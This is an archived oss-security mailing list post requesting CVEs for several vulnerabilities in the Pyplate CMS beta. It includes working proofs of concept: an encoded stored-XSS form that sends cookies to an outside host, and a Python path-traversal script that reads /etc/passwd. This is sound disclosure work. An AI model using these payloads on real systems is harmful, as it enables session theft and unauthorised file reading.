Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 14 May 2014 14:21:21 +0300
From: Henri Salo <>
Cc:, abuse@...LATE.COM,
Subject: CVE request: Pyplate multiple vulnerabilities

Hello list,

My friend Teemu V. "requested" security audit for Pyplate. While quickly
checking quality of this software I noticed following issues. This is not a full
security audit as I don't have much free time.

Tested version: v0.08 (still beta)
Vendor notification: 2014-05-13

Issue 1.

Installation instruction tells user to execute following commands without
checking any checksums or similar:

> wget
> chmod +x ./
> sudo ./

Issue 2.

File /usr/lib/cgi-bin/ creates passwd.db for admin user
password with world readable permissions. I like that salt :]

 20     salt="bla"
 22     hash=crypt.crypt(random_string,'$6$'+salt+'$')
 23     usercredentials="admin:"+hash
 25     passwdf=open("./passwd.db",'w')
 26     passwdf.write(usercredentials)
 27     passwdf.close() 

-rw-r--r-- 1 www-data www-data 99 May 13 20:45 /usr/share/pyplate/passwd.db

Issue 3.

Application is not using HttpOnly (nor Secure) flag in cookie "id".

Issue 4.

CSRF + XSS with cookie stealing PoC:

    <form action="" method="POST">
      <input type="hidden" name="title" value="&lt;script&gt;new&#32;Image&#40;&#41;&#46;src&#61;&quot;http&#58;&#47;&#47;bugs&#46;fi&#47;evil&#46;py&#63;cookie&#61;&quot;&#32;encodeURI&#40;document&#46;cookie&#41;&#59;&lt;&#47;script&gt;" />
      <input type="hidden" name="file" value="bugs" />
      <input type="hidden" name="category" value="&#47;" />
      <input type="hidden" name="post" value="&lt;p&gt;bugs&lt;&#47;p&gt;&#13;&#10;" />
      <input type="hidden" name="tags" value="" />
      <input type="hidden" name="description" value="" />
      <input type="hidden" name="state" value="new" />
      <input type="submit" value="Submit request" />

There is no CSRF protection and most of admin functionality contain stored XSS

Issue 5.

File /usr/lib/cgi-bin/ is used to download backup file from
installation after admin has created it in web-ui. Note the comment.

 21 # need to check that the filename doesn't contain slashes
 26     path = pyplate.getCMSRoot() + "/backup/" + filename
 27     file = open (path, 'rb')

Normally HTTP POST message looks like:

POST /cgi-bin/ HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 40


Attacker can use this without authentication to download arbitrary files from
the system. File needs to be readable by web server process. PoC for /etc/passwd

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests
payload = {'filename': '../../../../etc/passwd'}
r ='',
print r.text

If author responds with fixed in version I can coordinate this and send email to
abuse@ address for all users (which is not that many currently).

Henri Salo

Download attachment "signature.asc" of type "application/pgp-signature" (199 bytes)

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ